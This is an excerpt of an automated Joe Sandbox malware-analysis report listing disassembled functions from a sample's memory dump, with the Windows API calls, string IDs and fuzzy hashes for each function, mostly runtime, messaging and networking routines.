                                                                                                                      • Instruction ID: 37b8fb04e3978037d80b38431be1b1731f0c151b6ac7aae35432b208563c9054
                                                                                                                      • Opcode Fuzzy Hash: 25a011ee67ae7e35b776bd61167ac08c68c6123b8c96e7538d5cba86b25bdb6f
                                                                                                                      • Instruction Fuzzy Hash: 7071B9B89013419BC315DF6AA990494BBA4FB9934979C823FD00ACB372FBB444449F5F
                                                                                                                      Function 003ECC82 Relevance: 6.2, APIs: 4, Instructions: 154COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003A41A7: _fseek.LIBCMT ref: 003A41BF
                                                                                                                        • Part of subcall function 003ECE59: _wcscmp.LIBCMT ref: 003ECF49
                                                                                                                        • Part of subcall function 003ECE59: _wcscmp.LIBCMT ref: 003ECF5C
                                                                                                                      • _free.LIBCMT ref: 003ECDC9
                                                                                                                      • _free.LIBCMT ref: 003ECDD0
                                                                                                                      • _free.LIBCMT ref: 003ECE3B
                                                                                                                        • Part of subcall function 003C28CA: RtlFreeHeap.NTDLL(00000000,00000000,?,003C8715,00000000,003C88A3,003C4673,?), ref: 003C28DE
                                                                                                                        • Part of subcall function 003C28CA: GetLastError.KERNEL32(00000000,?,003C8715,00000000,003C88A3,003C4673,?), ref: 003C28F0
                                                                                                                      • _free.LIBCMT ref: 003ECE43
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1552873950-0
                                                                                                                      • Opcode ID: 3bbf84d6b84c5ccb4406d7a14d13c4f849fbec825050499589f31b9b6ee91132
                                                                                                                      • Instruction ID: 4f01c81904baca7805b121586b778f0ad006dc4ffec38c014ae53e5216a16a0c
                                                                                                                      • Opcode Fuzzy Hash: 3bbf84d6b84c5ccb4406d7a14d13c4f849fbec825050499589f31b9b6ee91132
                                                                                                                      • Instruction Fuzzy Hash: FF515DB1904218AFDF159F64CC81BAEB7B9FF49300F1004AEB219A7281D7715E808F19
                                                                                                                      Function 003A1E58 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 003A1E87
                                                                                                                        • Part of subcall function 003A38E4: _memset.LIBCMT ref: 003A3965
                                                                                                                        • Part of subcall function 003A38E4: _wcscpy.LIBCMT ref: 003A39B5
                                                                                                                        • Part of subcall function 003A38E4: Shell_NotifyIconW.SHELL32(00000001,?), ref: 003A39C6
                                                                                                                      • KillTimer.USER32(?,00000001), ref: 003A1EDC
                                                                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 003A1EEB
                                                                                                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00414526
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1378193009-0
                                                                                                                      • Opcode ID: 6c4f570847d68809f792993c496913ec04072c5f881e6ff6d29fff2a94c93689
                                                                                                                      • Instruction ID: 8aab6dc37ba954ba35d212379aafed34effba7fc4eb057773b13a14bf6c1bb5d
                                                                                                                      • Opcode Fuzzy Hash: 6c4f570847d68809f792993c496913ec04072c5f881e6ff6d29fff2a94c93689
                                                                                                                      • Instruction Fuzzy Hash: 3721D4B19043D4AFEB338B248855FEBBBECDB42308F04009EE69E56241C3785A85CB56
                                                                                                                      Function 003F92C0 Relevance: 6.1, APIs: 4, Instructions: 60networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003BF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,003EAEA5,?,?,00000000,00000008), ref: 003BF282
                                                                                                                        • Part of subcall function 003BF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,003EAEA5,?,?,00000000,00000008), ref: 003BF2A6
                                                                                                                      • gethostbyname.WS2_32(?), ref: 003F92F0
                                                                                                                      • WSAGetLastError.WS2_32(00000000), ref: 003F92FB
                                                                                                                      • _memmove.LIBCMT ref: 003F9328
                                                                                                                      • inet_ntoa.WS2_32(?), ref: 003F9333
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1504782959-0
                                                                                                                      • Opcode ID: d785f896680198562e392cbc9696e5b5a51d5a1dd79ae90f8baf7ae8f128f318
                                                                                                                      • Instruction ID: fbb2001872813b9a59bd895c370f569b518bdc119b8d27378182d60ee93cc125
                                                                                                                      • Opcode Fuzzy Hash: d785f896680198562e392cbc9696e5b5a51d5a1dd79ae90f8baf7ae8f128f318
                                                                                                                      • Instruction Fuzzy Hash: 1C118276A00509AFCB06FBA0DD56DEEB7B9FF58310B104065F606AB1A1DB34EE04CB61
                                                                                                                      Function 003DE2E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003A193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 003A1952
                                                                                                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 003DE344
                                                                                                                      • _strlen.LIBCMT ref: 003DE34F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Timeout_strlen
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 2777139624-2594219639
                                                                                                                      • Opcode ID: 25f0a18f45ca8ac95744dc44ec183d6f8b1a5c1375ec100692e39d2acb74fefe
                                                                                                                      • Instruction ID: 68fcb25fc454a4c8451174683b81a97fb7121bceb88d6e06bcab06e376847253
                                                                                                                      • Opcode Fuzzy Hash: 25f0a18f45ca8ac95744dc44ec183d6f8b1a5c1375ec100692e39d2acb74fefe
                                                                                                                      • Instruction Fuzzy Hash: C411A336200204A7CB06BB69ECC6DBF7FA9DF45340B00443EF606DF292DE649C4697A0
                                                                                                                      Function 003C010A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003C45EC: __FF_MSGBANNER.LIBCMT ref: 003C4603
                                                                                                                        • Part of subcall function 003C45EC: __NMSG_WRITE.LIBCMT ref: 003C460A
                                                                                                                        • Part of subcall function 003C45EC: RtlAllocateHeap.NTDLL(00F20000,00000000,00000001), ref: 003C462F
                                                                                                                      • std::exception::exception.LIBCMT ref: 003C013E
                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 003C0153
                                                                                                                        • Part of subcall function 003C7495: RaiseException.KERNEL32(?,?,003A125D,00456598,?,?,?,003C0158,003A125D,00456598,?,00000001), ref: 003C74E6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                      • String ID: bad allocation
                                                                                                                      • API String ID: 3902256705-2104205924
                                                                                                                      • Opcode ID: e3cf3dae8491a84e7acfcd17c6d47dd6cbc1df7029c91ec630f3dedc8408439a
                                                                                                                      • Instruction ID: 74ae2c81d6b114c6994b1b7349407686ef8f1d19dfb3bb23d5626ea103dbb87c
                                                                                                                      • Opcode Fuzzy Hash: e3cf3dae8491a84e7acfcd17c6d47dd6cbc1df7029c91ec630f3dedc8408439a
                                                                                                                      • Instruction Fuzzy Hash: BFF0A43960825DA6C71BAAE8E802FDEB7EC9F04350F54441EFD04DA181DBB09E8097A9
                                                                                                                      Function 003AC610 Relevance: 4.6, APIs: 3, Instructions: 125COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,003AC00E,?,?,?,?,00000010), ref: 003AC627
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,00000010), ref: 003AC65F
                                                                                                                      • _memmove.LIBCMT ref: 003AC697
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharMultiWide$_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3033907384-0
                                                                                                                      • Opcode ID: 4f8d4dccffb3ca6708f3c4229c2fade5b2b2d9256fd5c8ef96b45cca7f4fc8f1
                                                                                                                      • Instruction ID: e34059946304f09b9a7ed2356db25bccb7b11dda6e86335bddedcb0ace27cb84
                                                                                                                      • Opcode Fuzzy Hash: 4f8d4dccffb3ca6708f3c4229c2fade5b2b2d9256fd5c8ef96b45cca7f4fc8f1
                                                                                                                      • Instruction Fuzzy Hash: 373109B2600201ABD7299B38D846F6BB7D9EF45310F18553EF85ACB6A0EB32E850C751
                                                                                                                      Function 003C45EC Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __FF_MSGBANNER.LIBCMT ref: 003C4603
                                                                                                                        • Part of subcall function 003C8E52: __NMSG_WRITE.LIBCMT ref: 003C8E79
                                                                                                                        • Part of subcall function 003C8E52: __NMSG_WRITE.LIBCMT ref: 003C8E83
                                                                                                                      • __NMSG_WRITE.LIBCMT ref: 003C460A
                                                                                                                        • Part of subcall function 003C8EB2: GetModuleFileNameW.KERNEL32(00000000,00460312,00000104,?,00000001,003C0127), ref: 003C8F44
                                                                                                                        • Part of subcall function 003C8EB2: ___crtMessageBoxW.LIBCMT ref: 003C8FF2
                                                                                                                        • Part of subcall function 003C1D65: ___crtCorExitProcess.LIBCMT ref: 003C1D6B
                                                                                                                        • Part of subcall function 003C1D65: ExitProcess.KERNEL32 ref: 003C1D74
                                                                                                                        • Part of subcall function 003C889E: __getptd_noexit.LIBCMT ref: 003C889E
                                                                                                                      • RtlAllocateHeap.NTDLL(00F20000,00000000,00000001), ref: 003C462F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1372826849-0
                                                                                                                      • Opcode ID: a6daed34449580ead268698b7dc9b9061dacc46efdcc5e3950bde37d76de5ff7
                                                                                                                      • Instruction ID: d59a1c45853468d604eed31e691c42d5b27b1176146ffd26e5f4597d7852541d
                                                                                                                      • Opcode Fuzzy Hash: a6daed34449580ead268698b7dc9b9061dacc46efdcc5e3950bde37d76de5ff7
                                                                                                                      • Instruction Fuzzy Hash: 2101D231601311AAE6273B34AC22F6A3748AB82761F12003EF901DF596DFB09C418B69
                                                                                                                      Function 003AE60E Relevance: 4.5, APIs: 3, Instructions: 31windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • TranslateMessage.USER32(?), ref: 003AE646
                                                                                                                      • DispatchMessageW.USER32(?), ref: 003AE651
                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003AE664
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Message$DispatchPeekTranslate
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4217535847-0
                                                                                                                      • Opcode ID: 4d5108ba9267991bc4199800acaf9efed22b8dc06ca8a258343417ad6d894d56
                                                                                                                      • Instruction ID: d8c46843713153cb45129c3519573b94f1e8b96add170dfe076188c5201c757d
                                                                                                                      • Opcode Fuzzy Hash: 4d5108ba9267991bc4199800acaf9efed22b8dc06ca8a258343417ad6d894d56
                                                                                                                      • Instruction Fuzzy Hash: 4AF058326043469BDB21EAE08D49BABB3DDAF84340F480C3EB641C20A0EBA4D4008726
                                                                                                                      Function 003EC450 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _free.LIBCMT ref: 003EC45E
                                                                                                                        • Part of subcall function 003C28CA: RtlFreeHeap.NTDLL(00000000,00000000,?,003C8715,00000000,003C88A3,003C4673,?), ref: 003C28DE
                                                                                                                        • Part of subcall function 003C28CA: GetLastError.KERNEL32(00000000,?,003C8715,00000000,003C88A3,003C4673,?), ref: 003C28F0
                                                                                                                      • _free.LIBCMT ref: 003EC46F
                                                                                                                      • _free.LIBCMT ref: 003EC481
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 776569668-0
                                                                                                                      • Opcode ID: 087bea45b9e552155f1be1c866ba964bb642fabb90d708dc02c9b9c981af8e32
                                                                                                                      • Instruction ID: a611aef373909868293f3582efcccbf597ccb89253f1df2d21cc97d4c3b0fc31
                                                                                                                      • Opcode Fuzzy Hash: 087bea45b9e552155f1be1c866ba964bb642fabb90d708dc02c9b9c981af8e32
                                                                                                                      • Instruction Fuzzy Hash: 81E0C2A120075082CA22A97B6840FB723CC2F04390B04192DF449DB1C2CF38EC408634
                                                                                                                      Function 003B058E Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 527COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: CALL
                                                                                                                      • API String ID: 0-4196123274
                                                                                                                      • Opcode ID: b95af6db3605996ed70ecaa368f320850c734d47b72d517b875766b36a45122c
                                                                                                                      • Instruction ID: ce8aa6a28d58f9d862e1fb0a5c06d747db0687b5d97adb09bf6c7a14a325c7b5
                                                                                                                      • Opcode Fuzzy Hash: b95af6db3605996ed70ecaa368f320850c734d47b72d517b875766b36a45122c
                                                                                                                      • Instruction Fuzzy Hash: 81228E70508340CFD72ADF14C491AABB7E1FF85308F15896DEA968BB61D735E884CB42
                                                                                                                      Function 003A4010 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove
                                                                                                                      • String ID: EA06
                                                                                                                      • API String ID: 4104443479-3962188686
                                                                                                                      • Opcode ID: f9f7581f51cba879cec07006e9e5f30028c3ce9a4b459145c8c5c1c64d2a040f
                                                                                                                      • Instruction ID: 142dd4ddb4ab14d35197700fea9728714019598a226199732fce047673f91ad4
                                                                                                                      • Opcode Fuzzy Hash: f9f7581f51cba879cec07006e9e5f30028c3ce9a4b459145c8c5c1c64d2a040f
                                                                                                                      • Instruction Fuzzy Hash: CC419D31A041549BCB13DB648C967BFBFA5DBD7300F288575EA82DF283D6A18DC097A1
                                                                                                                      Function 003F013F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcscmp
                                                                                                                      • String ID: 0.0.0.0
                                                                                                                      • API String ID: 856254489-3771769585
                                                                                                                      • Opcode ID: b5f92c376d5aa594a75002bc1d8c2cd3407828f9de9a61ea117e29a0b2bdb61c
                                                                                                                      • Instruction ID: c261a3cbafcee7a3a6711412825fc7a70d166e3608d9702f1fe85054ac4ca83b
                                                                                                                      • Opcode Fuzzy Hash: b5f92c376d5aa594a75002bc1d8c2cd3407828f9de9a61ea117e29a0b2bdb61c
                                                                                                                      • Instruction Fuzzy Hash: FB11CA39700208DFCB09EF59D991E69B3A9BF49710F148059F605AF392DA70ED41CB94
                                                                                                                      Function 003A3BFF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 00413CF1
                                                                                                                        • Part of subcall function 003A31B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 003A31DA
                                                                                                                        • Part of subcall function 003A3A67: SHGetMalloc.SHELL32(1<:), ref: 003A3A7D
                                                                                                                        • Part of subcall function 003A3A67: SHGetDesktopFolder.SHELL32(?), ref: 003A3A8F
                                                                                                                        • Part of subcall function 003A3A67: SHGetPathFromIDListW.SHELL32(?,?), ref: 003A3AD2
